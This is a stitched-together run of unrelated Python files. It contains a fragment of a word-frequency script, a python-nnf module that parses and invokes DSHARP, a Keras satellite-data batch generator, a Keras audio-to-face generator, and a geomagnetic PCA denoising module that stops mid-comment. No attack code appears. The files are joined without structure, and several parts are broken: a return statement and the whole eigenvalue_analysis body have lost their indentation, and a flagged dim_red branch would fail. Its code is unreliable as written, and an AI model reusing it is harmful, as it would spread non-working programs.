        if le2 == data[w][:2] and len(le2) == 2:
            sum2f += 1
        if le3 == data[w][:3] and len(le3) == 3:
            sum3f += 1
        if le3h == data[w]:
            sumf += 1
    # Slot the word into the first top-10 position whose count it reaches.
    if sum1 <= sumf:
        sum1 = sumf
        le3h1 = le3h
    elif sum2 <= sumf:
        sum2 = sumf
        le3h2 = le3h
    elif sum3 <= sumf:
        sum3 = sumf
        le3h3 = le3h
    elif sum4 <= sumf:
        sum4 = sumf
        le3h4 = le3h
    elif sum5 <= sumf:
        le3h5 = le3h
        sum5 = sumf
    elif sum6 <= sumf:
        le3h6 = le3h
        sum6 = sumf
    elif sum7 <= sumf:
        sum7 = sumf
        le3h7 = le3h
    elif sum8 <= sumf:
        sum8 = sumf
        le3h8 = le3h
    elif sum9 <= sumf:
        sum9 = sumf
        le3h9 = le3h
    elif sum10 <= sumf:
        sum10 = sumf
        le3h10 = le3h
    # Same slotting for the two-letter prefix counts...
    if sum2f >= sumf2le1:
        f2le1 = le2
        sumf2le1 = sum2f
    elif sum2f >= sumf2le2:
        f2le2 = le2
        sumf2le2 = sum2f
    elif sum2f >= sumf2le3:
        f2le3 = le2
        sumf2le3 = sum2f
    # ...and the three-letter prefix counts.
    if sum3f >= sumf3le1:
        f3le1 = le3
        sumf3le1 = sum3f
    elif sum3f >= sumf3le2:
        f3le2 = le3
        sumf3le2 = sum3f
    elif sum3f >= sumf3le3:
        f3le3 = le3
        sumf3le3 = sum3f
print("oi deka dhmofilesteres le3eis einai:", le3h1, ",", le3h2, ",", le3h3, ",", le3h4, ",", le3h5, ",", le3h6, ",", le3h7, ",", le3h8, ",", le3h9, ",", le3h10)
print("oi 3 protoi sundiasmoi ton 2 proton grammaton pou arxizoun oi perissoteres le3eis einai:", f2le1, ",", f2le2, ",", f2le3)
print("oi 3 protoi sundiasmoi ton 3 proton grammaton pou arxizoun oi perissoteres le3eis einai:", f3le1, ",", f3le2, ",", f3le3)
|
<reponame>vishalbelsare/python-nnf
"""Interoperability with `DSHARP <https://github.com/QuMuLab/dsharp>`_.
``load`` and ``loads`` can be used to parse files created by DSHARP's
``-Fnnf`` option.
``compile`` invokes DSHARP directly to compile a sentence. This requires
having DSHARP installed.
The parser was derived by studying DSHARP's output and source code. This
format might be some sort of established standard, in which case this
parser might reject or misinterpret some valid files in the format.
DSHARP may not work properly for some (usually trivially) unsatisfiable
sentences, incorrectly reporting there's a solution. This bug dates back to
sharpSAT, on which DSHARP was based:
https://github.com/marcthurley/sharpSAT/issues/5
It was independently discovered by hypothesis during testing of this module.
"""
import io
import os
import subprocess
import tempfile
import typing as t
from nnf import NNF, And, Or, Var, false, true, dimacs
from nnf.util import Name
__all__ = ('load', 'loads', 'compile')
def load(
    fp: t.TextIO, var_labels: t.Optional[t.Dict[int, Name]] = None
) -> NNF:
    """Parse a sentence from an open DSHARP ``-Fnnf`` file.

    An optional ``var_labels`` dictionary can map integers to other names.
    """
    def name_of(num: int) -> Name:
        # Translate a file-local variable number to its external name.
        return var_labels[num] if var_labels is not None else num

    fmt, nodecount, edges, varcount = fp.readline().split()
    specs = [line.split() for line in fp]
    assert fmt == 'nnf'
    nodes = {}  # type: t.Dict[int, NNF]
    for num, spec in enumerate(specs):
        kind = spec[0]
        if kind == 'L':
            # Literal: negative numbers are negated variables.
            literal = spec[1]
            if literal.startswith('-'):
                nodes[num] = Var(name_of(int(literal[1:])), False)
            else:
                nodes[num] = Var(name_of(int(literal)))
        elif kind == 'A':
            # And-node: children start at field 2.
            nodes[num] = And(nodes[int(child)] for child in spec[2:])
        elif kind == 'O':
            # Or-node: field 2 is a conflict variable, children start at 3.
            nodes[num] = Or(nodes[int(child)] for child in spec[3:])
        else:
            raise ValueError("Can't parse line {}: {}".format(num, spec))
    if int(nodecount) == 0:
        raise ValueError("The sentence doesn't have any nodes.")
    # The last declared node is the sentence's root.
    return nodes[int(nodecount) - 1]
def loads(s: str, var_labels: t.Optional[t.Dict[int, Name]] = None) -> NNF:
    """Parse a DSHARP sentence held in a string."""
    buffer = io.StringIO(s)
    return load(buffer, var_labels)
def compile(
    sentence: And[Or[Var]],
    executable: str = 'dsharp',
    smooth: bool = False,
    timeout: t.Optional[int] = None,
    extra_args: t.Sequence[str] = ()
) -> NNF:
    """Run DSHARP to compile a CNF sentence to (s)d-DNNF.

    This requires having DSHARP installed.

    The returned sentence will be marked as deterministic.

    :param sentence: The CNF sentence to compile.
    :param executable: The path of the ``dsharp`` executable. If the
        executable is in your PATH there's no need to set this.
    :param smooth: Whether to produce a smooth sentence.
    :param timeout: Tell DSHARP to give up after a number of seconds.
    :param extra_args: Extra arguments to pass to DSHARP.
    :raises ValueError: If ``sentence`` is not in CNF.
    :raises RuntimeError: If DSHARP fails, times out, or produces
        unusable output.
    """
    # Assemble the command line before touching the filesystem.
    args = [executable]
    if smooth:
        args.append('-smoothNNF')
    if timeout is not None:
        args.extend(['-t', str(timeout)])
    args.extend(extra_args)
    if not sentence.is_CNF():
        raise ValueError("Sentence must be in CNF")
    # Handle cases D# doesn't like
    if not sentence.children:
        return true  # empty conjunction: trivially true
    if false in sentence.children:
        return false  # a false clause makes the whole CNF unsatisfiable
    # DIMACS variables are numbered from 1; remember the mapping so the
    # compiled result can be translated back to the original names.
    var_labels = dict(enumerate(sentence.vars(), start=1))
    var_labels_inverse = {v: k for k, v in var_labels.items()}
    infd, infname = tempfile.mkstemp(text=True)
    try:
        with open(infd, 'w') as f:
            dimacs.dump(sentence, f, mode='cnf', var_labels=var_labels_inverse)
        outfd, outfname = tempfile.mkstemp()
        try:
            # DSHARP writes to the path itself; the open descriptor is not needed.
            os.close(outfd)
            proc = subprocess.Popen(
                args + ['-Fnnf', outfname, infname],
                stdout=subprocess.PIPE,
                universal_newlines=True
            )
            log, _ = proc.communicate()
            with open(outfname) as f:
                out = f.read()
        finally:
            os.remove(outfname)
    finally:
        os.remove(infname)
    if proc.returncode != 0:
        raise RuntimeError(
            "DSHARP failed with code {}. Log:\n\n{}".format(
                proc.returncode, log
            )
        )
    # Heuristics for failure modes DSHARP does not report via exit code.
    if out == 'nnf 0 0 0\n' or 'problem line expected' in log:
        raise RuntimeError("Something went wrong. Log:\n\n{}".format(log))
    if 'TIMEOUT' in log:
        raise RuntimeError("DSHARP timed out after {} seconds".format(timeout))
    if 'Theory is unsat' in log:
        return false
    if not out:
        raise RuntimeError("Couldn't read file output. Log:\n\n{}".format(log))
    result = loads(out, var_labels=var_labels)
    result.mark_deterministic()
    NNF.decomposable.set(result, True)
    return result
|
<filename>generators.py
import numpy as np
import keras
from osgeo import gdal
class iasi_generator(keras.utils.Sequence):
    """Keras data generator for the IASI dataset.

    Streams batches of samples stored as per-sample ``.npy`` files on disk.
    """

    def __init__(self, files, batch_size=32, selected_channels=None, shuffle=True, dim_red=None, meta=False, norm_coeffs=None):
        """Initialization.

        files : list of lists, e.g. [[input_file1, target_file1], ...] or
            [[input_file1, target_file1, meta_file1], ...]
        batch_size : size of batch to be returned
        selected_channels : list of None / index arrays; when an element is
            an array it selects indices along the last dimension of the
            corresponding file (to exclude some bands or areas in images)
        shuffle : if True, shuffles the rows of ``files`` after each epoch
        dim_red : None, or a decomposition matrix for the spectral dimension
        meta : accepted but never stored or read  # NOTE(review): unused parameter
        norm_coeffs : None, or a pair of per-channel coefficients applied to
            the first (input) array  # NOTE(review): inferred from usage below - confirm
        """
        self.batch_size = batch_size
        self.files = files
        self.shuffle = shuffle
        self.dim_red = dim_red
        self.on_epoch_end()
        self.norm_coeffs = norm_coeffs
        if selected_channels:
            self.selected_channels = selected_channels
        else:
            self.selected_channels = [None]*len(files[0])
        # Record the (possibly channel-subset) shape of each file of the
        # first sample; used to pre-allocate the batch arrays.
        self.shapes = []
        # NOTE(review): self.selected_channels is always a non-empty list at
        # this point, so the 'else' branch below appears unreachable.
        if self.selected_channels:
            for i, (el, ind) in enumerate(zip(files[0], self.selected_channels)):
                if isinstance(ind, np.ndarray):
                    self.shapes.append(np.load(el)[..., ind].shape)
                else:
                    self.shapes.append(np.load(el).shape)
        else:
            for el in files[0]:
                self.shapes.append(np.load(el).shape)

    def __len__(self):
        """Denotes the number of batches per epoch"""
        return(int(np.floor(len(self.files) / self.batch_size)))

    def __getitem__(self, index):
        """Generate one batch of data"""
        # Generate indexes of the batch
        indexes = self.indexes[index*self.batch_size:(index+1)*self.batch_size]
        # Find list of IDs
        batch_files = [self.files[k] for k in indexes]
        # Generate data
        data = self.__data_generation(batch_files)
        return( data)

    def on_epoch_end(self):
        """Updates indexes after each epoch"""
        self.indexes = np.arange(len(self.files))
        if self.shuffle == True:
            np.random.shuffle(self.indexes)

    def __data_generation(self, batch_files):
        """Generates data containing batch_size samples
        # X : (n_samples, *dim, n_channels)"""
        # Create Empty arrays, one batch array per file slot
        data_list = []
        for shp in self.shapes:
            data_list.append(np.empty((self.batch_size, *shp)))
        # Load data
        for i in range(self.batch_size):
            for j, (el, ind) in enumerate(zip(batch_files[i], self.selected_channels)):
                if isinstance(ind, np.ndarray):
                    data_list[j][i] = np.load(el)[..., ind].astype('float32')
                else:
                    data_list[j][i] = np.load(el).astype('float32')
            # NOTE(review): the dim_red branch looks broken and is left
            # unchanged pending confirmation of intent:
            # - `if self.dim_red:` raises for a numpy array (ambiguous truth);
            # - `self.shapes[0]*self.shapes[1]` multiplies two shape *tuples*
            #   (TypeError) - probably meant self.shapes[0][0]*self.shapes[0][1];
            # - `data_list[0].reshape(...)` reshapes the whole batch rather
            #   than sample i.
            if self.dim_red:
                data_list[0][i] = np.dot(data_list[0].reshape((self.shapes[0]*self.shapes[1],self.shapes[2])), self.dim_red)
            elif self.norm_coeffs:
                # Per-channel normalisation of the input array only.
                data_list[0][i] = (data_list[0][i] - np.array(self.norm_coeffs[0]).reshape((1,1,1,len(self.norm_coeffs[0]))) ) / np.array(self.norm_coeffs[1]).reshape((1,1,1,len(self.norm_coeffs[1])))
        # if data_aug:
        #     # add code for data augmentation here...
return(data_list) |
<gh_stars>100-1000
from keras.models import load_model
import numpy as np
from keras.optimizers import Adam
from keras.models import Model
from keras.layers import Dense, Conv2DTranspose, Conv2D, BatchNormalization, \
Activation, Concatenate, Input, MaxPool2D,\
UpSampling2D, ZeroPadding2D, Lambda, Add
from keras.callbacks import ModelCheckpoint
from keras import backend as K
import keras
import cv2
import os
import librosa
import scipy
from keras.utils import plot_model
import tensorflow as tf
from keras.utils import multi_gpu_model
from discriminator import contrastive_loss
class ModelMGPU(Model):
    """Multi-GPU wrapper that keeps checkpointing on the serial model.

    The multi-GPU replica's attributes are copied onto this instance, while
    ``load``/``save``-style methods are delegated to the wrapped serial
    model, which holds references to the canonical weights.
    """

    def __init__(self, ser_model, gpus):
        parallel_model = multi_gpu_model(ser_model, gpus)
        self.__dict__.update(parallel_model.__dict__)
        self._smodel = ser_model

    def __getattribute__(self, attrname):
        """Serve load*/save* attributes from the serial model; everything
        else resolves normally on the multi-gpu wrapper."""
        if 'load' in attrname or 'save' in attrname:
            return getattr(self._smodel, attrname)
        return super(ModelMGPU, self).__getattribute__(attrname)
def conv_block(x, num_filters, kernel_size=3, strides=1, padding='same', act=True):
    """Conv2D -> BatchNorm -> (optional) ReLU building block."""
    out = Conv2D(filters=num_filters, kernel_size=kernel_size,
                 strides=strides, padding=padding)(x)
    out = BatchNormalization(momentum=.8)(out)
    # Activation is skipped when act=False (e.g. for linear output layers).
    return Activation('relu')(out) if act else out
def conv_t_block(x, num_filters, kernel_size=3, strides=2, padding='same'):
    """Transposed-convolution upsampling block: ConvT -> BatchNorm -> ReLU."""
    out = Conv2DTranspose(filters=num_filters, kernel_size=kernel_size,
                          strides=strides, padding=padding)(x)
    out = BatchNormalization(momentum=.8)(out)
    return Activation('relu')(out)
def create_model(args):
    """Build the plain (non-residual) audio-to-face generator.

    U-Net-style encoder/decoder: a face/identity encoder and an audio encoder
    meet in a joint embedding; the decoder upsamples back to a 96x96 face
    using skip connections from the face encoder.

    Args:
        args: namespace providing ``img_size`` (input face resolution),
            ``n_gpu`` (number of GPUs) and optionally ``lr`` (Adam learning
            rate; the default 'adam' optimizer is used when absent).

    Returns:
        tuple: ``(parallel_model, ser_model)`` — the compiled model used for
        training (ModelMGPU-wrapped when ``args.n_gpu > 1``) and the
        underlying single-GPU model (the same object when ``n_gpu <= 1``).
    """
    ############# encoder for face/identity
    input_face = Input(shape=(args.img_size, args.img_size, 6), name="input_face")
    identity_mapping = conv_block(input_face, 32, kernel_size=11) # 96x96
    x1_face = conv_block(identity_mapping, 64, kernel_size=7, strides=2) # 48x48
    x2_face = conv_block(x1_face, 128, 5, 2) # 24x24
    x3_face = conv_block(x2_face, 256, 3, 2) #12x12
    x4_face = conv_block(x3_face, 512, 3, 2) #6x6
    x5_face = conv_block(x4_face, 512, 3, 2) #3x3
    x6_face = conv_block(x5_face, 512, 3, 1, padding='valid')
    x7_face = conv_block(x6_face, 256, 1, 1)
    ############# encoder for audio
    input_audio = Input(shape=(12,35,1), name="input_audio")
    x = conv_block(input_audio, 64)
    # BUG FIX: this layer previously read from input_audio again, silently
    # discarding the 64-filter block above; chain from x instead.
    x = conv_block(x, 128)
    x = ZeroPadding2D(((1,0),(0,0)))(x)
    x = conv_block(x, 256, strides=(1, 2))
    x = conv_block(x, 256)
    x = conv_block(x, 256, strides=2)
    x = conv_block(x, 512, strides=2)
    x = conv_block(x, 512, (4, 5), 1, padding='valid')
    x = conv_block(x, 256, 1, 1)
    embedding = Concatenate(axis=3)([x7_face, x])
    ############# decoder
    # (A leftover `conv_block(embedding, 512, 1)` whose output was immediately
    # overwritten has been removed; the decoder starts from the embedding,
    # matching create_model_residual below.)
    x = conv_t_block(embedding, 512, 3, 3)# 3x3
    x = Concatenate(axis=3) ([x5_face, x])
    x = conv_t_block(x, 512) #6x6
    x = Concatenate(axis=3) ([x4_face, x])
    x = conv_t_block(x, 256) #12x12
    x = Concatenate(axis=3) ([x3_face, x])
    x = conv_t_block(x, 128) #24x24
    x = Concatenate(axis=3) ([x2_face, x])
    x = conv_t_block(x, 64) #48x48
    x = Concatenate(axis=3) ([x1_face, x])
    x = conv_t_block(x, 32) #96x96
    x = Concatenate(axis=3) ([identity_mapping, x])
    x = conv_block(x, 16) #96x96
    x = conv_block(x, 16) #96x96
    x = Conv2D(filters=3, kernel_size=1, strides=1, padding="same") (x)
    prediction = Activation("sigmoid", name="prediction")(x)
    model = Model(inputs=[input_face, input_audio], outputs=prediction)
    model.summary()
    ser_model = model
    if args.n_gpu > 1:
        parallel_model = ModelMGPU(ser_model , args.n_gpu)
    else:
        parallel_model = ser_model
    parallel_model.compile(loss='mae', optimizer=(Adam(lr=args.lr) if hasattr(args, 'lr') else 'adam'))
    return parallel_model, ser_model
def create_model_residual(args):
    """Build the residual variant of the audio-to-face generator.

    Same encoder/embedding/decoder layout as ``create_model`` but with
    ResNet-style residual blocks inserted at most resolutions.

    Args:
        args: namespace providing ``img_size``, ``n_gpu`` and optionally
            ``lr`` (Adam learning rate; 'adam' defaults are used when absent).

    Returns:
        The compiled generator model (wrapped in ModelMGPU when
        ``args.n_gpu > 1``).
    """
    def residual_block(inp, num_filters):
        # Two conv blocks plus an identity skip connection, ReLU on the sum.
        x = conv_block(inp, num_filters)
        x = conv_block(x, num_filters)
        x = Add()([x, inp])
        x = Activation('relu') (x)
        return x
    ############# encoder for face/identity
    input_face = Input(shape=(args.img_size, args.img_size, 6), name="input_face")
    identity_mapping = conv_block(input_face, 32, kernel_size=7) # 96x96
    x1_face = conv_block(identity_mapping, 64, kernel_size=5, strides=2) # 48x48
    x1_face = residual_block(x1_face, 64)
    x1_face = residual_block(x1_face, 64)
    x2_face = conv_block(x1_face, 128, 3, 2) # 24x24
    x2_face = residual_block(x2_face, 128)
    x2_face = residual_block(x2_face, 128)
    x2_face = residual_block(x2_face, 128)
    x3_face = conv_block(x2_face, 256, 3, 2) #12x12
    x3_face = residual_block(x3_face, 256)
    x3_face = residual_block(x3_face, 256)
    x4_face = conv_block(x3_face, 512, 3, 2) #6x6
    x4_face = residual_block(x4_face, 512)
    x4_face = residual_block(x4_face, 512)
    x5_face = conv_block(x4_face, 512, 3, 2) #3x3
    x6_face = conv_block(x5_face, 512, 3, 1, padding='valid')
    x7_face = conv_block(x6_face, 512, 1, 1)
    ############# encoder for audio
    input_audio = Input(shape=(12,35,1), name="input_audio")
    x = conv_block(input_audio, 128)
    x = residual_block(x, 128)
    x = residual_block(x, 128)
    x = residual_block(x, 128)
    x = ZeroPadding2D(((1,0),(0,0)))(x)
    x = conv_block(x, 256, strides=(1, 2))
    x = residual_block(x, 256)
    x = residual_block(x, 256)
    x = conv_block(x, 512, strides=2)
    x = residual_block(x, 512)
    x = residual_block(x, 512)
    x = conv_block(x, 512, strides=2)
    x = residual_block(x, 512)
    x = conv_block(x, 512, (4, 5), 1, padding='valid')
    x = conv_block(x, 512, 1, 1)
    # Fuse face identity features and audio features along channels.
    embedding = Concatenate(axis=3)([x7_face, x])
    ############# decoder
    x = conv_t_block(embedding, 512, 3, 3)# 3x3
    x = Concatenate(axis=3) ([x5_face, x])
    x = conv_t_block(x, 512) #6x6
    x = residual_block(x, 512)
    x = residual_block(x, 512)
    x = Concatenate(axis=3) ([x4_face, x])
    x = conv_t_block(x, 256) #12x12
    x = residual_block(x, 256)
    x = residual_block(x, 256)
    x = Concatenate(axis=3) ([x3_face, x])
    x = conv_t_block(x, 128) #24x24
    x = residual_block(x, 128)
    x = residual_block(x, 128)
    x = Concatenate(axis=3) ([x2_face, x])
    x = conv_t_block(x, 64) #48x48
    x = residual_block(x, 64)
    x = residual_block(x, 64)
    x = Concatenate(axis=3) ([x1_face, x])
    x = conv_t_block(x, 32) #96x96
    x = Concatenate(axis=3) ([identity_mapping, x])
    x = conv_block(x, 16) #96x96
    x = conv_block(x, 16) #96x96
    x = Conv2D(filters=3, kernel_size=1, strides=1, padding="same") (x)
    prediction = Activation("sigmoid", name="prediction")(x)
    model = Model(inputs=[input_face, input_audio], outputs=prediction)
    model.summary()
    if args.n_gpu > 1:
        model = ModelMGPU(model , args.n_gpu)
    model.compile(loss='mae', optimizer=(Adam(lr=args.lr) if hasattr(args, 'lr') else 'adam'))
    return model
def create_combined_model(generator, discriminator, args):
    """Stack a frozen discriminator on the generator for adversarial training.

    The combined model maps (face, audio) to (generated face, discriminator
    score); only the generator's weights are trainable here.
    """
    face_in = Input(shape=(args.img_size, args.img_size, 6), name="input_face_comb")
    audio_in = Input(shape=(12, 35, 1), name="input_audio_comb")
    generated_face = generator([face_in, audio_in])
    # Freeze the discriminator so gradients only update the generator.
    discriminator.trainable = False
    validity = discriminator([generated_face, audio_in])
    combined = Model([face_in, audio_in], [generated_face, validity])
    if args.n_gpu > 1:
        combined = ModelMGPU(combined, args.n_gpu)
    combined.compile(loss=['mae', contrastive_loss],
                     optimizer=(Adam(lr=args.lr) if hasattr(args, 'lr') else 'adam'),
                     loss_weights=[1., .01])
    return combined
if __name__ == '__main__':
    # Smoke-test entry point: build the residual generator.
    # BUG FIX: the original called create_model_residual() with no arguments,
    # which always raised TypeError because `args` is required. Supply the
    # attributes the builders read (img_size, n_gpu, lr) via argparse.
    import argparse
    parser = argparse.ArgumentParser(description='Build the generator model')
    parser.add_argument('--img_size', type=int, default=96)
    parser.add_argument('--n_gpu', type=int, default=1)
    parser.add_argument('--lr', type=float, default=1e-4)
    model = create_model_residual(parser.parse_args())
    #plot_model(model, to_file='model.png', show_shapes=True)
<filename>magpysv/denoise.py<gh_stars>10-100
# -*- coding: utf-8 -*-
# Copyright (C) 2016 <NAME> (University of Liverpool)
#
# Released under the MIT license, a copy of which is located at the root of
# this project.
"""Module containing functions to remove external signal from geomagnetic data.
Part of the MagPySV package for geomagnetic data analysis. This module provides
various functions to denoise geomagnetic data by performing principal component
analysis and identifying and removing outliers. Also contains an outlier
detection function based on median absolute deviation from the median (MAD).
"""
import pandas as pd
import magpysv.plots as plots
import numpy as np
from sklearn.decomposition import PCA as sklearnPCA
try:
from sklearn.preprocessing import Imputer
except ImportError:
from sklearn.impute import SimpleImputer as Imputer
def eigenvalue_analysis_impute(*, dates, obs_data, model_data, residuals,
                               proxy_number=1):
    """Remove external signal from SV data using Principal Component Analysis.
    Perform principal component analysis (PCA) on secular variation
    residuals (the difference between the observed SV and that predicted by a
    geomagnetic field model) calculated from annual differences of monthly
    means at several observatories. Uses the imputer from sklearn
    to fill in missing data points and calculates the singular values of the
    data matrix for n observatories (uses Singular Values Decomposition, SVD).
    The residuals are rotated into the eigendirections and denoised using the
    method detailed in Wardinski & Holme (2011, GJI,
    https://doi.org/10.1111/j.1365-246X.2011.04988.x). The SV residuals of the
    noisy component for all observatories combined are used as a proxy for the
    unmodelled external signal. The denoised data are then rotated back into
    geographic coordinates. The pca algorithm outputs the singular values
    (these are equal to the square root of the eigenvalues of the covariance
    matrix) sorted from largest to smallest, so the corresponding eigenvector
    matrix has the 'noisy' direction in the first column and the 'clean'
    direction in the final column.
    Note that the SVD algorithm cannot be used if any data are missing, which
    is why imputation is needed with this method. The function
    denoise.eigenvalue_analysis permits missing values and does not
    infill them - that is the more robust function.
    Smallest eigenvalue: 'quiet' direction
    Largest eigenvalue: 'noisy' direction
    Args:
        dates (datetime.datetime): dates of the time series measurements.
        obs_data (pandas.DataFrame): dataframe containing columns for
            monthly/annual means of the X, Y and Z components of the secular
            variation at the observatories of interest.
        model_data (pandas.DataFrame): dataframe containing columns for field
            model prediction of the X, Y and Z components of the secular
            variation at the same observatories as in obs_data.
        residuals (pandas.DataFrame): dataframe containing the SV residuals
            (difference between the observed data and model prediction).
        proxy_number (int): the number of 'noisy' directions used to create
            the proxy for the external signal removal. Default value is 1 (only
            the residual in the direction of the largest eigenvalue is used).
            Using n directions means that proxy is the sum of the SV residuals
            in the n noisiest eigendirections.
    Returns:
        (tuple): tuple containing:
        - denoised_sv (*pandas.DataFrame*):
            dataframe with dates in the first
            column and columns for the denoised X, Y and Z secular variation
            components at each of the observatories for which data were
            provided.
        - proxy (*array*):
            the signal that was used as a proxy for unmodelled
            external magnetic field in the denoising stage.
        - eig_values (*array*):
            the singular values of the obs_data matrix.
        - eig_vectors (*array*):
            the eigenvectors associated with the n largest
            singular values of the data matrix. For example, if the residuals
            in the two 'noisiest' directions are used as the proxy for external
            signal, then these two eigenvectors are returned.
        - projected_residuals (*array*):
            SV residuals rotated into the eigendirections.
        - corrected_residuals (*array*):
            SV residuals after the denoising process.
    """
    # Fill in missing SV values (indicated as NaN in the data files).
    # BUG FIX: the legacy preprocessing.Imputer takes the string 'NaN' and an
    # `axis` keyword; its replacement impute.SimpleImputer (aliased to Imputer
    # by the import fallback at the top of this module) takes np.nan and has
    # no `axis` parameter. Support both constructors.
    try:
        imp = Imputer(missing_values='NaN', strategy='mean', axis=0)
    except TypeError:
        imp = Imputer(missing_values=np.nan, strategy='mean')
    imputed_residuals = imp.fit_transform(residuals)
    pca = sklearnPCA()
    projected_residuals = pca.fit_transform(imputed_residuals)
    eig_values = pca.explained_variance_
    # BUG FIX: PCA.components_ stores eigenvectors as *rows*
    # ((n_components, n_features)); transpose so each eigendirection is a
    # column, matching the docstring, the column indexing below, and the
    # layout returned by eigenvalue_analysis().
    eig_vectors = pca.components_.T
    # Use the method of Wardinski & Holme (2011) to remove unmodelled external
    # signal in the SV residuals. The variable 'proxy' contains the noisy
    # component residual for all observatories combined
    corrected_residuals = []
    if proxy_number == 1:
        noisy_direction = eig_vectors[:, 0]
        proxy = projected_residuals[:, 0]
        for idx in range(len(proxy)):
            # BUG FIX: fit_transform returns a plain ndarray; index it
            # directly (`.data[idx, :]` sliced a memoryview, which does not
            # support multi-dimensional slicing).
            corrected_residuals.append(
                imputed_residuals[idx, :] - proxy[idx] * noisy_direction)
    elif proxy_number > 1:
        noisy_direction = eig_vectors[:, 0:proxy_number]
        # Proxy is the sum of the residuals in the n noisiest directions.
        proxy = np.sum(projected_residuals[:, 0:proxy_number], axis=1)
        for idx in range(len(projected_residuals[:, 0])):
            corrected = imputed_residuals[idx, :]
            for direction in range(proxy_number):
                corrected = corrected - projected_residuals[idx, direction] \
                    * noisy_direction[:, direction]
            corrected_residuals.append(corrected)
    corrected_residuals = pd.DataFrame(corrected_residuals,
                                       columns=obs_data.columns)
    # Rotate back to geographic coordinates and add the model prediction.
    denoised_sv = pd.DataFrame(
        corrected_residuals.values + model_data.values,
        columns=obs_data.columns)
    denoised_sv.insert(0, 'date', dates)
    return denoised_sv, proxy, eig_values, eig_vectors, projected_residuals,\
        corrected_residuals.astype('float')
def eigenvalue_analysis(*, dates, obs_data, model_data, residuals,
proxy_number=1):
"""Remove external signal from SV data using principal Component Analysis.
Perform principal component analysis (PCA) on secular variation
residuals (the difference between the observed SV and that predicted by a
geomagnetic field model) calculated from annual differences of monthly
means at several observatories. Uses masked arrays to discount missing data
points and calculates the eigenvalues/vectors of the (3nx3n) covariance
matrix for n observatories. The residuals are rotated into the
eigendirections and denoised using the method detailed in Wardinski & Holme
(2011, GJI, https://doi.org/10.1111/j.1365-246X.2011.04988.x). The SV
residuals of the noisy component for all observatories
combined are used as a proxy for the unmodelled external signal. The
denoised data are then rotated back into geographic coordinates. The PCA
algorithm outputs the eigenvalues sorted from largest to smallest, so the
corresponding eigenvector matrix has the 'noisy' direction in the first
column and the 'clean' direction in the final column.
This algorithm masks missing data so that they are not taken into account
during the PCA. Missing values are not infilled or estimated, so NaN
values in the input dataframe are given as NaN values in the output.
Smallest eigenvalue 'quiet' direction
Largest eiegenvalue 'noisy' direction
Args:
dates (datetime.datetime): dates of the time series measurements.
obs_data (pandas.DataFrame): dataframe containing columns for
monthly/annual means of the X, Y and Z components of the secular
variation at the observatories of interest.
model_data (pandas.DataFrame): dataframe containing columns for field
model prediction of the X, Y and Z components of the secular
variation at the same observatories as in obs_data.
residuals (pandas.DataFrame): dataframe containing the SV residuals
(difference between the observed data and model prediction).
proxy_number (int): the number of 'noisy' directions used to create
the proxy for the external signal removal. Default value is 1 (only
the residual in the direction of the largest eigenvalue is used).
Using n directions means that proxy is the sum of the SV residuals
in the n noisiest eigendirections.
Returns:
(tuple): tuple containing:
- denoised_sv (*pandas.DataFrame*):
dataframe with datetime objects in the
first column and columns for the denoised X, Y and Z SV components
at each of the observatories for which data were provided.
- proxy (*array*):
the signal that was used as a proxy for unmodelled
external magnetic field in the denoising stage.
- eig_values (*array*):
the eigenvalues of the obs_data matrix.
- eig_vectors (*array*):
the eigenvectors associated with the n largest
eigenvalues of the data matrix. For example, if the residuals
in the two 'noisiest' directions are used as the proxy for external
signal, then these two eigenvectors are returned.
- projected_residuals (*array*):
SV residuals rotated into the eigendirections.
- corrected_residuals (*array*):
SV residuals after the denoising process.
- covariance_matrix (*array*): residuals covariance matrix.
"""
# Create a masked version of the residuals array so that we can perform the
# PCA ignoring all nan values
masked_residuals = np.ma.array(residuals, mask=np.isnan(residuals))
# Calculate the covariance matrix of the masked residuals array
covariance_matrix = np.ma.cov(masked_residuals, rowvar=False,
allow_masked=True)
# Calculate the eigenvalues and eigenvectors of the covariance matrix
eig_values, eig_vectors = np.linalg.eig(covariance_matrix)
# Sort the absolute values of the eigenvalues in decreasing order
idx = np.argsort(np.abs(eig_values))[::-1]
eig_values = eig_values[idx]
# Sort the eigenvectors according to the same index
eig_vectors = eig_vectors[:, idx]
# Project the residuals onto the eigenvectors
projected_residuals = np.ma.dot(masked_residuals, eig_vectors)
# Use the method of Wardinski & Holme (2011) to remove unmodelled external
# signal in the SV residuals. The variable 'proxy' contains the noisy
# component residual for all observatories combined
corrected_residuals = []
if proxy_number == 1:
noisy_direction = eig_vectors[:, 0]
proxy = projected_residuals[:, 0]
for idx in range(len(proxy)):
corrected_residuals.append(
masked_residuals.data[idx, :] - proxy[idx] * noisy_direction)
elif proxy_number > 1:
noisy_direction = eig_vectors[:, 0:proxy_number]
proxy = np.sum(projected_residuals[:, 0:proxy_number], axis=1)
for idx in range(len(projected_residuals[:, 0])):
corrected = masked_residuals.data[idx, :]
for direction in range(proxy_number):
corrected = corrected - projected_residuals[idx, direction] \
* noisy_direction[:, direction]
corrected_residuals.append(corrected)
corrected_residuals = pd.DataFrame(corrected_residuals,
columns=obs_data.columns)
denoised_sv = pd.DataFrame(
corrected_residuals.values + model_data.values,
columns=obs_data.columns)
denoised_sv.insert(0, 'date', dates)
return denoised_sv, proxy, np.abs(eig_values), eig_vectors,\
projected_residuals, corrected_residuals.astype('float'),\
covariance_matrix
def detect_outliers(*, dates, signal, obs_name, window_length, threshold,
                    signal_type='SV', plot_fig=False, save_fig=False,
                    write_path=None, fig_size=(8, 6), font_size=12,
                    label_size=16):
    """Flag outliers with a running-median MAD test and blank them.

    A running median over ``window_length`` samples tracks the local level of
    the (long, highly variable) series; points lying more than ``threshold``
    median absolute deviations (MAD) from that running median are treated as
    outliers and replaced with NaN in ``signal`` (modified in place).

    Args:
        dates (datetime.datetime): dates of the time series measurements.
        signal (array): time series of interest (e.g. a pandas column).
        obs_name (str): component plus three-digit IAGA observatory name.
        threshold (float): minimum number of MADs from the running median
            for a point to count as an outlier.
        window_length (int): number of months in the running-median window.
        signal_type (str): 'MF' (magnetic field) or 'SV' (secular variation)
            label used when plotting. Defaults to SV.
        plot_fig (bool): plot the series with outliers highlighted.
        save_fig (bool): save the figure if plotted.
        write_path (str): output path for a saved figure.
        fig_size (array): figure size in inches. Defaults to 8x6.
        font_size (int): axes font size. Defaults to 12 pt.
        label_size (int): axis-label font size. Defaults to 16 pt.

    Returns:
        signal (array): the input signal with outliers set to NaN.
    """
    working = pd.DataFrame(data=signal.copy())
    # Bridge NaN gaps so the rolling statistics stay defined: ffill pushes
    # the last valid value forward (limited to half a window so it cannot
